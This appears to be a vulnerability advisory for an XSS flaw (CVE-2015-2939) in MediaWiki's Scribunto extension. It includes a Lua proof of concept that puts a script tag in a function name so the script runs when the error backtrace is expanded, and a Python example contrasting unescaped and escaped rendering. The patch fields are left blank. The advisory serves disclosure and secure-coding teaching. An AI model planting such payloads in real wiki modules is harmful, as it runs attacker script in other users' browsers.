Function names in Scribunto's Lua error backtraces are inserted into the rendered HTML without being escaped, allowing cross-site scripting (XSS). A module author controls those names, so any markup placed in a function name is emitted verbatim. Proof-of-concept:
local p = {}
-- The function name is attacker-controlled and carries raw markup.
p['<script>alert("XSS")</script>'] = function()
    error('CLICK ME')
end
function p.main(frame)
    -- Calling through the hostile name puts it in the error backtrace.
    p['<script>alert("XSS")</script>']()
end
return p

If a user clicks the error message produced by invoking p.main() (clicking expands the backtrace), the injected script executes in that user's browser.
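To show the rendering defect and its fix side by side, here is an added Python simulation of a backtrace renderer; it is illustrative code, not Scribunto's PHP, and the frame structure and sample names are constructed for this example. The unsafe renderer interpolates the Lua function name straight into HTML, which is the pattern the advisory describes; the hardened renderer HTML-escapes every attacker-influenced field at the point of output.

```python
import html

# Constructed sample backtrace frames, shaped roughly like what a Lua runtime
# reports (constructed data for this example; not real Scribunto output).
SAMPLE_BACKTRACE = [
    {"name": '<script>alert("XSS")</script>', "source": "Module:Example", "line": 4},
    {"name": "main", "source": "Module:Example", "line": 7},
]


def render_backtrace_unsafe(frames):
    """Interpolates each frame's fields into HTML verbatim.

    This is the defect: a function name that contains markup becomes live
    markup in the page that displays the error.
    """
    items = "".join(
        "<li>{}:{}: in function {}</li>".format(f["source"], f["line"], f["name"])
        for f in frames
    )
    return '<ul class="backtrace">' + items + "</ul>"


def render_backtrace_safe(frames):
    """Same layout, but every field is escaped before it reaches the document.

    Escaping the name alone would close this particular hole; escaping every
    interpolated field is the habit that keeps the next one from opening.
    """
    items = "".join(
        "<li>{}:{}: in function {}</li>".format(
            html.escape(str(f["source"]), quote=True),
            html.escape(str(f["line"]), quote=True),
            html.escape(str(f["name"]), quote=True),
        )
        for f in frames
    )
    return '<ul class="backtrace">' + items + "</ul>"


def contains_script_element(markup):
    """Crude indicator used only to compare the two renderers: is there still
    an unescaped <script start tag in the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe:", render_backtrace_unsafe(SAMPLE_BACKTRACE))
    print("safe:  ", render_backtrace_safe(SAMPLE_BACKTRACE))
```

Running it prints the hostile name as a live `<script>` element in the unsafe output and as `&lt;script&gt;...` text in the safe output. The general rule the example illustrates: treat anything a module author can name (functions, and by extension any identifier echoed in an error message) as untrusted text, and escape it where it is written into HTML, not where it is produced.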
Patch:
- 1.24:
- 1.23:
Affected Versions: (needed)
Type: xss
CVE: CVE-2015-2939